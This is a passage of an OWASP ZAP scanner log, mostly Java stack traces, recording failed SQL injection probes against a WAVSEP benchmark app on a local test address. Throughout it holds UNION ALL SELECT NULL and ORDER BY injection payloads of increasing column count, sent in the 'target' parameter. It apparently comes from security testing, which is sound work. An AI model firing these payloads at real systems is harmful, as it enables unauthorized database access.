org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679506 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679507 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679507 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679508 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679508 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679509 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679510 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679511 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679511 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679513 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679513 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679514 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 5278#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 5278# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679515 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 